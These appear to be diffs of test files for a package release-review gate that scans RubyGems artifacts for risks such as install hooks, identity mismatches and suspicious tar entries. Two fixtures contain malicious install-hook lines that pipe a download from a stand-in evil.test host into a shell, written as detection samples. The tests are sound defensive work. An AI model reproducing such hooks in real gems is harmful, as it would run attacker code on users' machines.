+platform: ruby
+dependencies: []
+executables: []
+extensions: []
+require_paths:
+- lib
+licenses: []
+metadata: {}
+`);
+    expect(spec.name).toBe("tiny");
+    expect(spec.version).toBe("0.1.0");
+    expect(spec.executables).toEqual([]);
+    expect(spec.extensions).toEqual([]);
+    expect(spec.dependencies).toEqual([]);
+    expect(spec.metadata).toEqual({});
+  });
+
+  test("renders a compound ruby version requirement", () => {
+    const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
+name: ranged
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '2.6'
+  - - "<"
+    - !ruby/object:Gem::Version
+      version: '4.0'
+`);
+    expect(spec.requiredRubyVersion).toBe(">= 2.6, < 4.0");
+  });
+
+  test("degrades to empty summary on junk input", () => {
+    expect(parseGemspecMetadata("not yaml at all").name).toBeNull();
+    expect(parseGemspecMetadata(null).executables).toEqual([]);
+    expect(parseGemspecMetadata("").dependencies).toEqual([]);
+  });
+
+  test("unquotes double-quoted scalars", () => {
+    const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
+name: "quoted-name"
+version: !ruby/object:Gem::Version
+  version: "1.2.3"
+executables:
+- "my exe"
+`);
+    expect(spec.name).toBe("quoted-name");
+    expect(spec.version).toBe("1.2.3");
+    expect(spec.executables).toEqual(["my exe"]);
+  });
+});

--- a/test/rubygems-gemspec.test.mjs
+++ b/test/rubygems-gemspec.test.mjs
@@ -150,6 +150,37 @@ required_ruby_version: !ruby/object:Gem::Requirement
     expect(parseGemspecMetadata("").dependencies).toEqual([]);
   });
 
+  // Psych treats quoted keys as the same mapping key (last write wins), so a
+  // crafted spec could show this parser one identity while RubyGems publishes
+  // under another. The parser must fail closed on any root-level key shape it
+  // does not model instead of skipping it.
+  test("fails closed when a quoted top-level key could shadow the identity", () => {
+    const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
+name: trusted-gem
+"name": evil-gem
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+`);
+    expect(spec.name).toBeNull();
+    expect(spec.version).toBeNull();
+  });
+
+  // Psych reads only the first YAML document; keys read across a second
+  // document could disagree with the identity RubyGems sees.
+  test("fails closed on a second YAML document", () => {
+    const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
+name: evil-gem
+version: !ruby/object:Gem::Version
+  version: 9.9.9
+--- !ruby/object:Gem::Specification
+name: trusted-gem
+version: !ruby/object:Gem::Version
+  version: 1.0.0
+`);
+    expect(spec.name).toBeNull();
+    expect(spec.version).toBeNull();
+  });
+
   test("unquotes double-quoted scalars", () => {
     const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
 name: "quoted-name"

--- a/test/rubygems.test.mjs
+++ b/test/rubygems.test.mjs
@@ -1,0 +1,380 @@
+// @ts-nocheck
+import { describe, expect, test } from "vitest";
+import {
+  acquireBaselineRubyGems,
+  acquireStagedRubyGems,
+  createRubyGemsReleaseCandidateReview,
+  isAllowedRubyGemsArtifactUrl,
+  isValidGemName,
+  isValidGemVersion,
+  normalizeGemName,
+  parseRubyGemsAdapterInput,
+  parseRubyGemsReleaseManifest,
+  pickRubyGemsBaselineVersion,
+} from "../server/lib/adapters/rubygems/index.ts";
+import { RUBYGEMS_RULE_IDS } from "../server/lib/adapters/rubygems/types.ts";
+
+function file(path, textSample, extra = {}) {
+  return {
+    path,
+    size: (textSample ?? "").length,
+    sha256: `sha-${path}`,
+    flags: [],
+    textSample,
+    ...extra,
+  };
+}
+
+// Build a Psych-shaped Gem::Specification metadata.gz payload (decoded text).
+function gemspec({
+  name,
+  version,
+  platform = "ruby",
+  executables = [],
+  extensions = [],
+  dependencies = [],
+  metadata = {},
+}) {
+  const lines = [
+    "--- !ruby/object:Gem::Specification",
+    `name: ${name}`,
+    "version: !ruby/object:Gem::Version",
+    `  version: ${version}`,
+    `platform: ${platform}`,
+    "bindir: bin",
+  ];
+  if (dependencies.length) {
+    lines.push("dependencies:");
+    for (const dep of dependencies) {
+      lines.push("- !ruby/object:Gem::Dependency", `  name: ${dep.name}`, `  type: :${dep.type}`);
+    }
+  } else {
+    lines.push("dependencies: []");
+  }
+  lines.push(executables.length ? "executables:" : "executables: []");
+  for (const exe of executables) lines.push(`- ${exe}`);
+  lines.push(extensions.length ? "extensions:" : "extensions: []");
+  for (const ext of extensions) lines.push(`- ${ext}`);
+  if (Object.keys(metadata).length) {
+    lines.push("metadata:");
+    for (const [key, value] of Object.entries(metadata)) lines.push(`  ${key}: ${value}`);
+  } else {
+    lines.push("metadata: {}");
+  }
+  lines.push("require_paths:", "- lib");
+  return lines.join("\n") + "\n";
+}
+
+function gemArtifact(path, spec, files) {
+  return { path, files, gemMetadata: gemspec(spec) };
+}
+
+function manifestFor(packageName, version, artifacts) {
+  return {
+    schema: "drydock.release-artifacts.v1",
+    ecosystem: "rubygems",
+    package: packageName,
+    version,
+    artifacts: artifacts.map((artifact) => ({ path: artifact.path, sha256: "a".repeat(64) })),
+  };
+}
+
+function findingIds(review) {
+  return review.ruleFindings.map((finding) => finding.ruleId);
+}
+
+describe("rubygems manifest", () => {
+  test("accepts a valid gem manifest", () => {
+    const manifest = parseRubyGemsReleaseManifest(
+      manifestFor("example", "1.0.0", [{ path: "example-1.0.0.gem" }]),
+    );
+    expect(manifest.package).toBe("example");
+    expect(manifest.version).toBe("1.0.0");
+    expect(manifest.artifacts[0].sha256).toBe("a".repeat(64));
+  });
+
+  test("rejects a non-.gem artifact and bad identity", () => {
+    expect(() =>
+      parseRubyGemsReleaseManifest(manifestFor("example", "1.0.0", [{ path: "example.tgz" }])),
+    ).toThrow(/\.gem/);
+    expect(() =>
+      parseRubyGemsReleaseManifest(manifestFor("..bad", "1.0.0", [{ path: "x.gem" }])),
+    ).toThrow(/valid gem name/);
+    expect(() =>
+      parseRubyGemsReleaseManifest(manifestFor("example", "x.y", [{ path: "x.gem" }])),
+    ).toThrow(/safe gem version/);
+  });
+
+  test("name + version validators", () => {
+    expect(isValidGemName("rails-html-sanitizer")).toBe(true);
+    expect(isValidGemName("-bad")).toBe(false);
+    expect(isValidGemVersion("1.2.0.pre.1")).toBe(true);
+    expect(isValidGemVersion("v1")).toBe(false);
+    expect(normalizeGemName("Foo_Bar")).toBe("foo_bar");
+  });
+});
+
+describe("rubygems release review", () => {
+  test("flags a native extension and a malicious install build hook", () => {
+    const artifact = gemArtifact(
+      "native-1.0.0.gem",
+      { name: "native", version: "1.0.0", extensions: ["ext/native/extconf.rb"] },
+      [
+        file(
+          "ext/native/extconf.rb",
+          "require 'mkmf'\nsystem('curl http://evil.test/x | sh')\ncreate_makefile('native')\n",
+        ),
+        file("lib/native.rb", "module Native; end\n"),
+      ],
+    );
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("native", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.nativeExtension);
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.extensionBuildHook);
+    // The shared ruby code scan also flags the install-time shell-out.
+    expect(findingIds(review).some((id) => id.startsWith("code."))).toBe(true);
+    expect(review.risk).toBe("high");
+  });
+
+  test("flags a malicious build hook declared outside ext", () => {
+    const artifact = gemArtifact(
+      "root-hook-1.0.0.gem",
+      { name: "root-hook", version: "1.0.0", extensions: ["install.rb"] },
+      [
+        file("install.rb", "system 'curl https://evil.test/install | sh'\n"),
+        file("lib/root_hook.rb", "module RootHook; end\n"),
+      ],
+    );
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("root-hook", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.nativeExtension);
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.extensionBuildHook);
+    expect(review.risk).toBe("high");
+  });
+
+  test("a pure-ruby gem with a benign extconf is only medium", () => {
+    const artifact = gemArtifact(
+      "calc-2.0.0.gem",
+      { name: "calc", version: "2.0.0", extensions: ["ext/calc/extconf.rb"] },
+      [
+        file(
+          "ext/calc/extconf.rb",
+          "require 'mkmf'\nhave_header('stdio.h')\ncreate_makefile('calc')\n",
+        ),
+        file("lib/calc.rb", "module Calc; end\n"),
+      ],
+    );
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("calc", "2.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.nativeExtension);
+    expect(findingIds(review)).not.toContain(RUBYGEMS_RULE_IDS.extensionBuildHook);
+    expect(review.risk).toBe("medium");
+  });
+
+  test("critical when the gemspec identity disagrees with the manifest", () => {
+    const artifact = gemArtifact("good-1.0.0.gem", { name: "evil", version: "9.9.9" }, [
+      file("lib/good.rb", "x = 1\n"),
+    ]);
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("good", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.metadataMismatch);
+    expect(review.risk).toBe("critical");
+  });
+
+  test("medium when the gem ships no gemspec metadata", () => {
+    const artifact = {
+      path: "bare-1.0.0.gem",
+      gemMetadata: null,
+      files: [file("lib/bare.rb", "x\n")],
+    };
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("bare", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.metadataMissing);
+  });
+
+  test("surfaces suspicious inner tar entries from gem data archives", () => {
+    const artifact = {
+      path: "linked-1.0.0.gem",
+      gemMetadata: gemspec({ name: "linked", version: "1.0.0" }),
+      files: [file("lib/linked.rb", "module Linked; end\n")],
+      suspiciousEntries: [
+        {
+          kind: "non-regular",
+          path: "lib/linked.rb",
+          detail: "typeflag 2 (symlink)",
+        },
+      ],
+    };
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("linked", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    const finding = review.ruleFindings.find((entry) => entry.ruleId === "tar.suspicious-entry");
+
+    expect(finding).toMatchObject({
+      severity: "high",
+      file: "ruby/lib/linked.rb",
+    });
+  });
+
+  test("surfaces a non-rubygems allowed_push_host", () => {
+    const artifact = gemArtifact(
+      "priv-1.0.0.gem",
+      {
+        name: "priv",
+        version: "1.0.0",
+        metadata: { allowed_push_host: "https://gems.internal.test" },
+      },
+      [file("lib/priv.rb", "x\n")],
+    );
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("priv", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    expect(findingIds(review)).toContain(RUBYGEMS_RULE_IDS.unexpectedPushHost);
+  });
+
+  test("diffs added files against a provided previous gem", () => {
+    const previous = gemArtifact("demo-1.0.0.gem", { name: "demo", version: "1.0.0" }, [
+      file("lib/demo.rb", "module Demo; end\n", { sha256: "sha-demo-shared" }),
+    ]);
+    const staged = gemArtifact("demo-1.1.0.gem", { name: "demo", version: "1.1.0" }, [
+      file("lib/demo.rb", "module Demo; end\n", { sha256: "sha-demo-shared" }),
+      file("bin/demo", "#!/usr/bin/env ruby\n"),
+    ]);
+    const review = createRubyGemsReleaseCandidateReview({
+      manifest: manifestFor("demo", "1.1.0", [staged]),
+      artifacts: [staged],
+      previousArtifacts: [previous],
+    });
+    const added = review.diff
+      .filter((entry) => entry.status === "added")
+      .map((entry) => entry.path);
+    expect(added).toContain("ruby/bin/demo");
+    expect(review.previousFileCount).toBe(1);
+  });
+});
+
+describe("rubygems baseline selection", () => {
+  test("picks the newest stable version that is not the candidate", () => {
+    const versions = [
+      { number: "1.0.0", platform: "ruby", prerelease: false, built_at: "2026-01-01T00:00:00Z" },
+      { number: "1.2.0", platform: "ruby", prerelease: false, built_at: "2026-03-01T00:00:00Z" },
+      { number: "2.0.0.rc1", platform: "ruby", prerelease: true, built_at: "2026-04-01T00:00:00Z" },
+    ];
+    const selection = pickRubyGemsBaselineVersion(versions, "2.0.0.rc1");
+    expect(selection.version).toBe("1.2.0");
+    expect(selection.source).toBe("latest-published");
+  });
+
+  test("falls back to a pre-release when no stable baseline exists", () => {
+    const versions = [
+      { number: "1.0.0.pre", platform: "ruby", prerelease: true, built_at: "2026-01-01T00:00:00Z" },
+    ];
+    const selection = pickRubyGemsBaselineVersion(versions, "1.0.0");
+    expect(selection.version).toBe("1.0.0.pre");
+    expect(selection.source).toBe("upload-time");
+  });
+
+  test("reports none when only the candidate is published", () => {
+    const selection = pickRubyGemsBaselineVersion(
+      [{ number: "1.0.0", platform: "ruby", prerelease: false }],
+      "1.0.0",
+    );
+    expect(selection.version).toBeNull();
+  });
+});
+
+describe("rubygems baseline acquisition (broker)", () => {
+  const ctx = { env: {}, executionCtx: {}, db: {}, session: { userId: "user_1" } };
+
+  function adapterInput(version, platform = "ruby") {
+    const artifact = gemArtifact(`demo-${version}.gem`, { name: "demo", version, platform }, [
+      file("lib/demo.rb", "module Demo; end\n"),
+    ]);
+    return parseRubyGemsAdapterInput({
+      manifest: manifestFor("demo", version, [artifact]),
+      artifacts: [artifact],
+    });
+  }
+
+  test("downloads and diffs the rubygems.org baseline version", async () => {
+    const input = adapterInput("1.1.0");
+    const staged = acquireStagedRubyGems(input);
+    const broker = {
+      async fetchGemVersions() {
+        return [{ number: "1.0.0", platform: "ruby", prerelease: false }];
+      },
+      async downloadPublicGem(url) {
+        expect(url).toBe("https://rubygems.org/downloads/demo-1.0.0.gem");
+        return {
+          files: [file("lib/demo.rb", "module Demo; end\n")],
+          gemMetadata: gemspec({ name: "demo", version: "1.0.0" }),
+        };
+      },
+      dispose() {},
+    };
+    const result = await acquireBaselineRubyGems(ctx, input, broker, staged);
+    expect(result.artifact).not.toBeNull();
+    expect(result.baseline.version).toBe("1.0.0");
+  });
+
+  test("degrades to a full-tree review when the baseline download fails", async () => {
+    const input = adapterInput("1.1.0");
+    const staged = acquireStagedRubyGems(input);
+    const broker = {
+      async fetchGemVersions() {
+        return [{ number: "1.0.0", platform: "ruby", prerelease: false }];
+      },
+      async downloadPublicGem() {
+        throw new Error("rubygems.org is unreachable");
+      },
+      dispose() {},
+    };
+    const result = await acquireBaselineRubyGems(ctx, input, broker, staged);
+    expect(result.artifact).toBeNull();
+    expect(result.baseline.reason).toContain("download-failed");
+  });
+
+  test("reports an empty baseline when versions metadata is unavailable", async () => {
+    const input = adapterInput("1.0.0");
+    const staged = acquireStagedRubyGems(input);
+    const broker = {
+      async fetchGemVersions() {
+        return null;
+      },
+      async downloadPublicGem() {
+        throw new Error("should not be called");
+      },
+      dispose() {},
+    };
+    const result = await acquireBaselineRubyGems(ctx, input, broker, staged);
+    expect(result.artifact).toBeNull();
+    expect(result.baseline.source).toBe("none");
+  });
+});
+
+describe("rubygems artifact url allowlist", () => {
+  test("only accepts rubygems.org download URLs over https", () => {
+    expect(isAllowedRubyGemsArtifactUrl("https://rubygems.org/downloads/rake-13.0.6.gem")).toBe(
+      true,
+    );
+    expect(isAllowedRubyGemsArtifactUrl("http://rubygems.org/downloads/rake-13.0.6.gem")).toBe(
+      false,
+    );
+    expect(isAllowedRubyGemsArtifactUrl("https://evil.test/downloads/rake.gem")).toBe(false);
+    expect(isAllowedRubyGemsArtifactUrl("https://rubygems.org/api/v1/gems/rake.json")).toBe(false);
+  });
+});

--- a/test/rubygems.test.mjs
+++ b/test/rubygems.test.mjs
@@ -11,6 +11,7 @@ import {
   parseRubyGemsAdapterInput,
   parseRubyGemsReleaseManifest,
   pickRubyGemsBaselineVersion,
+  rubygemsAdapter,
 } from "../server/lib/adapters/rubygems/index.ts";
 import { RUBYGEMS_RULE_IDS } from "../server/lib/adapters/rubygems/types.ts";
 
@@ -264,6 +265,25 @@ describe("rubygems release review", () => {
       .map((entry) => entry.path);
     expect(added).toContain("ruby/bin/demo");
     expect(review.previousFileCount).toBe(1);
+  });
+
+  test("summarizeDetails surfaces reviewed gem digests as a provenance block", () => {
+    const artifact = gemArtifact("demo-1.0.0.gem", { name: "demo", version: "1.0.0" }, [
+      file("lib/demo.rb", "module Demo; end\n"),
+    ]);
+    const input = rubygemsAdapter.parseInput({
+      manifest: manifestFor("demo", "1.0.0", [artifact]),
+      artifacts: [artifact],
+    });
+    const staged = acquireStagedRubyGems(input);
+
+    // Provenance binds the report to the digests the gate recomputed from the
+    // immutable bytes, mirroring the npm and PyPI gates.
+    expect(rubygemsAdapter.summarizeDetails(staged.details).provenance).toEqual({
+      ecosystem: "rubygems",
+      mode: "workflow_gate",
+      artifacts: [{ path: "demo-1.0.0.gem", kind: "gem", sha256: "a".repeat(64) }],
+    });
   });
 });
 

--- a/test/security-corpus-rubygems.test.mjs
+++ b/test/security-corpus-rubygems.test.mjs
@@ -1,0 +1,61 @@
+import { readdirSync, readFileSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import { dirname, join } from "node:path";
+import { describe, expect, test } from "vitest";
+import {
+  createRubyGemsReleaseCandidateReview,
+  parseRubyGemsReleaseManifest,
+  RUBYGEMS_RULES_VERSION,
+} from "../server/lib/adapters/rubygems/index.ts";
+import { DETERMINISTIC_RULES_VERSION } from "../server/lib/review.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const casesDir = join(__dirname, "fixtures/security-corpus/cases-rubygems");
+const cases = readdirSync(casesDir)
+  .filter((file) => file.endsWith(".json"))
+  .sort()
+  .map((file) => JSON.parse(readFileSync(join(casesDir, file), "utf8")));
+
+function comparableFindings(findings) {
+  return findings
+    .map((finding) => ({
+      ruleId: finding.ruleId,
+      severity: finding.severity,
+      file: finding.file,
+    }))
+    .sort((a, b) =>
+      `${a.ruleId}:${a.severity}:${a.file}`.localeCompare(`${b.ruleId}:${b.severity}:${b.file}`),
+    );
+}
+
+describe("RubyGems security detection golden corpus", () => {
+  test("corpus contains unique fixture IDs", () => {
+    expect(cases.length).toBeGreaterThan(0);
+    expect(new Set(cases.map((fixture) => fixture.id)).size).toBe(cases.length);
+  });
+
+  for (const fixture of cases) {
+    test(`${fixture.id}: ${fixture.title}`, () => {
+      const review = createRubyGemsReleaseCandidateReview({
+        manifest: parseRubyGemsReleaseManifest(fixture.manifest),
+        artifacts: fixture.artifacts,
+        previousArtifacts: fixture.previousArtifacts,
+      });
+
+      expect(review.risk).toBe(fixture.expectedRisk);
+      expect(comparableFindings(review.ruleFindings)).toEqual(
+        comparableFindings(fixture.expectedFindings ?? []),
+      );
+
+      // rubygems.* findings carry RUBYGEMS_RULES_VERSION; shared file.*/code.*
+      // findings carry DETERMINISTIC_RULES_VERSION.
+      for (const finding of review.ruleFindings) {
+        if (finding.ruleId.startsWith("rubygems.")) {
+          expect(finding.ruleVersion).toBe(RUBYGEMS_RULES_VERSION);
+        } else {
+          expect(finding.ruleVersion).toBe(DETERMINISTIC_RULES_VERSION);
+        }
+      }
+    });
+  }
+});

--- a/test/tar-parser.test.mjs
+++ b/test/tar-parser.test.mjs
@@ -37,6 +37,11 @@ describe("normalizeTarPath", () => {
     expect(normalizeTarPath("//etc/passwd")).toBe("etc/passwd");
   });
 
+  test("can preserve a leading `package/` prefix for non-npm tar users", () => {
+    expect(normalizeTarPath("package/index.rb", false)).toBe("package/index.rb");
+    expect(normalizeTarPath("/package/lib/foo.rb", false)).toBe("package/lib/foo.rb");
+  });
+
   test("rejects path traversal sequences", () => {
     expect(normalizeTarPath("package/../../../etc/passwd")).toBeNull();
     expect(normalizeTarPath("../escape")).toBeNull();

--- a/test/workers/workflow-gate-prepare.test.ts
+++ b/test/workers/workflow-gate-prepare.test.ts
@@ -29,7 +29,11 @@ async function seedGateForTest(opts: {
   installationExternalId: string;
   repositoryId: number;
   runId: number;
+  ecosystem?: "pypi" | "npm" | "rubygems";
+  environment?: string;
 }) {
+  const ecosystem = opts.ecosystem ?? "pypi";
+  const environment = opts.environment ?? "pypi";
   const db = createDb(env.DB);
   const now = new Date();
   const userId = `user_${crypto.randomUUID()}`;
@@ -54,10 +58,10 @@ async function seedGateForTest(opts: {
   const releaseTarget = await createReleaseTarget(db, {
     organizationId,
     installationRowId: installation.id,
-    ecosystem: "pypi",
+    ecosystem,
     repositoryId: opts.repositoryId,
     repositoryFullName: "octo/example",
-    environment: "pypi",
+    environment,
     createdByUserId: null,
   });
 
@@ -70,7 +74,7 @@ async function seedGateForTest(opts: {
     deliveryId: crypto.randomUUID(),
     repositoryId: opts.repositoryId,
     repositoryFullName: "octo/example",
-    environment: "pypi",
+    environment,
     runId: opts.runId,
     deploymentId: 909,
     deploymentCallbackUrl: `https://api.github.com/repos/octo/example/actions/runs/${opts.runId}/deployment_protection_rule`,
@@ -207,6 +211,56 @@ function buildLoaderMock(fileSets: SandboxFile[][]) {
   };
 }
 
+// A `.gem` sandbox parse surfaces inner files plus the raw Gem::Specification
+// YAML as `gemMetadata`; the gem gate adapter reads identity from that text.
+function gemspecYaml(name: string, version: string, platform = "ruby"): string {
+  return (
+    [
+      "--- !ruby/object:Gem::Specification",
+      `name: ${name}`,
+      "version: !ruby/object:Gem::Version",
+      `  version: ${version}`,
+      `platform: ${platform}`,
+      "dependencies: []",
+      "executables: []",
+      "extensions: []",
+      "metadata: {}",
+      "require_paths:",
+      "- lib",
+    ].join("\n") + "\n"
+  );
+}
+
+function buildGemLoaderMock(
+  sets: Array<{ files: SandboxFile[]; gemMetadata: string | null; suspiciousEntries?: unknown[] }>,
+) {
+  const calls: { format: string | null }[] = [];
+  let index = 0;
+  return {
+    calls,
+    binding: {
+      load: vi.fn(() => ({
+        getEntrypoint: () => ({
+          fetch: vi.fn(async (request: Request) => {
+            calls.push({ format: request.headers.get("x-archive-format") });
+            const set = sets[Math.min(index, sets.length - 1)] ?? { files: [], gemMetadata: null };
+            index += 1;
+            return new Response(
+              JSON.stringify({
+                files: set.files,
+                packageJson: null,
+                gemMetadata: set.gemMetadata,
+                ...(set.suspiciousEntries ? { suspiciousEntries: set.suspiciousEntries } : {}),
+              }),
+              { status: 200, headers: { "content-type": "application/json" } },
+            );
+          }),
+        }),
+      })),
+    },
+  };
+}
+
 function buildCtxWithGateway() {
   const ctx = createExecutionContext() as ExecutionContext & {
     exports: { NpmStageGateway(options: { props: unknown }): Fetcher };
@@ -239,9 +293,11 @@ async function buildScenario(
   runId: number,
   opts?: {
     artifactPaths?: string[];
+    artifactName?: string;
     extraArtifacts?: Array<{ id: number; name: string; artifactPaths: string[] }>;
   },
 ) {
+  const artifactName = opts?.artifactName ?? "pypi-release-candidate";
   const artifactPaths = opts?.artifactPaths ?? ["dist/demo_package-1.2.0-py3-none-any.whl"];
   const bundles = new Map<number, Uint8Array>();
   const bundleZip = zipForArtifactPaths(artifactPaths);
@@ -265,7 +321,7 @@ async function buildScenario(
           artifacts: [
             {
               id: 88888,
-              name: "pypi-release-candidate",
+              name: artifactName,
               size_in_bytes: bundleZip.length,
               expired: false,
             },
@@ -523,6 +579,113 @@ describe("prepareReleaseCandidatesForGate", () => {
     const refreshed = await getGateForOrganization(db, seeded.organizationId, seeded.gateId);
     expect(refreshed?.status).toBe("pending");
     expect(refreshed?.failureReason).toBe("artifact_identity_inconsistent");
+  });
+
+  test("derives the gem release identity for a pinned rubygems target", async () => {
+    const seeded = await seedGateForTest({
+      installationExternalId: "9120",
+      repositoryId: 71010,
+      runId: 13131,
+      ecosystem: "rubygems",
+      environment: "rubygems",
+    });
+    const scenario = await buildScenario(13131, {
+      artifactPaths: ["pkg/example-1.4.0.gem"],
+      artifactName: "rubygems-release-candidate",
+    });
+    const loaderMock = buildGemLoaderMock([
+      {
+        files: [
+          { path: "lib/example.rb", size: 8, sha256: "cd".repeat(32), flags: [], textSample: "x" },
+        ],
+        gemMetadata: gemspecYaml("example", "1.4.0"),
+      },
+    ]);
+    const ctx = buildCtxWithGateway();
+    const bindings = buildConfigBindings();
+    const config = readGithubAppConfig({
+      ...bindings,
+      BETTER_AUTH_SECRET: bindings.BETTER_AUTH_SECRET,
+    });
+    const sandboxEnv = {
+      ...env,
+      ...bindings,
+      LOADER: loaderMock.binding as unknown as WorkerLoader,
+    } as Cloudflare.Env;
+
+    const db = createDb(env.DB);
+    const result = await prepareReleaseCandidatesForGate(sandboxEnv, ctx, db, {
+      config,
+      organizationId: seeded.organizationId,
+      gateId: seeded.gateId,
+    });
+
+    expect(result.packages).toHaveLength(1);
+    const [prepared] = result.packages;
+    expect(prepared.candidate.ecosystem).toBe("rubygems");
+    expect(prepared.packageAdapter.id).toBe("rubygems");
+    expect(prepared.candidate.package).toEqual({ name: "example", version: "1.4.0" });
+    // The `.gem` extension routes through the dedicated sandbox gem parse path.
+    expect(loaderMock.calls[0].format).toBe("gem");
+    expect(scenario.artifactPaths[0]).toBe("pkg/example-1.4.0.gem");
+  });
+
+  test("preserves suspicious gem tar entries in the rubygems pipeline input", async () => {
+    const seeded = await seedGateForTest({
+      installationExternalId: "9121",
+      repositoryId: 71011,
+      runId: 14141,
+      ecosystem: "rubygems",
+      environment: "rubygems",
+    });
+    await buildScenario(14141, {
+      artifactPaths: ["pkg/linked-1.0.0.gem"],
+      artifactName: "rubygems-release-candidate",
+    });
+    const loaderMock = buildGemLoaderMock([
+      {
+        files: [
+          { path: "lib/linked.rb", size: 8, sha256: "cd".repeat(32), flags: [], textSample: "x" },
+        ],
+        gemMetadata: gemspecYaml("linked", "1.0.0"),
+        suspiciousEntries: [
+          {
+            kind: "non-regular",
+            path: "lib/linked.rb",
+            detail: "typeflag 2 (symlink)",
+          },
+        ],
+      },
+    ]);
+    const ctx = buildCtxWithGateway();
+    const bindings = buildConfigBindings();
+    const config = readGithubAppConfig({
+      ...bindings,
+      BETTER_AUTH_SECRET: bindings.BETTER_AUTH_SECRET,
+    });
+    const sandboxEnv = {
+      ...env,
+      ...bindings,
+      LOADER: loaderMock.binding as unknown as WorkerLoader,
+    } as Cloudflare.Env;
+
+    const db = createDb(env.DB);
+    const result = await prepareReleaseCandidatesForGate(sandboxEnv, ctx, db, {
+      config,
+      organizationId: seeded.organizationId,
+      gateId: seeded.gateId,
+    });
+    const pipelineInput = result.packages[0].candidate.pipelineInput as {
+      artifacts: Array<{ suspiciousEntries?: unknown[] }>;
+    };
+
+    expect(pipelineInput.artifacts[0].suspiciousEntries).toEqual([
+      {
+        kind: "non-regular",
+        path: "lib/linked.rb",
+        detail: "typeflag 2 (symlink)",
+      },
+    ]);
   });
 
   test("rejects with bundle_unavailable when the gate id does not belong to the org", async () => {

--- a/test/workers/workflow-gate-rubygems.test.ts
+++ b/test/workers/workflow-gate-rubygems.test.ts
@@ -1,0 +1,127 @@
+import { describe, expect, test } from "vitest";
+import { WorkflowArtifactError } from "../../server/lib/github-app/artifacts";
+import {
+  classifyBundleArtifact,
+  getWorkflowGateAdapter,
+  supportedWorkflowGateEcosystems,
+} from "../../server/lib/workflow-gates/registry";
+import { rubygemsWorkflowGateAdapter } from "../../server/lib/workflow-gates/rubygems";
+import type { ParsedGateArtifact } from "../../server/lib/workflow-gates/types";
+
+function gemspec(opts: { name: string; version: string; platform?: string }): string {
+  return (
+    [
+      "--- !ruby/object:Gem::Specification",
+      `name: ${opts.name}`,
+      "version: !ruby/object:Gem::Version",
+      `  version: ${opts.version}`,
+      `platform: ${opts.platform ?? "ruby"}`,
+      "dependencies: []",
+      "executables: []",
+      "extensions: []",
+      "metadata: {}",
+      "require_paths:",
+      "- lib",
+    ].join("\n") + "\n"
+  );
+}
+
+function parsedGem(
+  path: string,
+  spec: { name: string; version: string; platform?: string } | null,
+): ParsedGateArtifact {
+  return {
+    path,
+    sha256: "a".repeat(64),
+    ecosystem: "rubygems",
+    kind: "gem",
+    files: [{ path: "lib/x.rb", size: 2, sha256: "s".repeat(64), flags: [] }],
+    packageJson: null,
+    gemMetadata: spec ? gemspec(spec) : null,
+  };
+}
+
+describe("rubygems workflow-gate adapter", () => {
+  test("is registered and reachable by ecosystem", () => {
+    expect(getWorkflowGateAdapter("rubygems")).toBe(rubygemsWorkflowGateAdapter);
+    expect(supportedWorkflowGateEcosystems()).toContain("rubygems");
+  });
+
+  test("classifies only .gem entries, by path (never ambiguous)", () => {
+    expect(rubygemsWorkflowGateAdapter.classifyArtifact("pkg/example-1.0.0.gem")).toBe("gem");
+    expect(rubygemsWorkflowGateAdapter.classifyArtifact("example-1.0.0.tgz")).toBeNull();
+    expect(rubygemsWorkflowGateAdapter.classifyArtifact("example.whl")).toBeNull();
+    // A `.gem` is path-unique, so the combined classifier resolves it directly
+    // to rubygems rather than the ambiguous-archive sentinel npm/PyPI share.
+    expect(classifyBundleArtifact("example-1.0.0.gem")).toEqual({
+      ecosystem: "rubygems",
+      kind: "gem",
+    });
+  });
+
+  test("one gem becomes one candidate with a derived manifest", () => {
+    const candidates = rubygemsWorkflowGateAdapter.prepareReleaseCandidates([
+      parsedGem("example-1.0.0.gem", { name: "Example", version: "1.0.0" }),
+    ]);
+    expect(candidates).toHaveLength(1);
+    expect(candidates[0].ecosystem).toBe("rubygems");
+    expect(candidates[0].package).toEqual({ name: "Example", version: "1.0.0" });
+    const manifest = candidates[0].pipelineInput.manifest as { artifacts: unknown[] };
+    expect(manifest.artifacts).toHaveLength(1);
+  });
+
+  test("native multi-platform gems collapse into one candidate", () => {
+    const candidates = rubygemsWorkflowGateAdapter.prepareReleaseCandidates([
+      parsedGem("native-1.0.0.gem", { name: "native", version: "1.0.0", platform: "ruby" }),
+      parsedGem("native-1.0.0-x86_64-linux.gem", {
+        name: "native",
+        version: "1.0.0",
+        platform: "x86_64-linux",
+      }),
+    ]);
+    expect(candidates).toHaveLength(1);
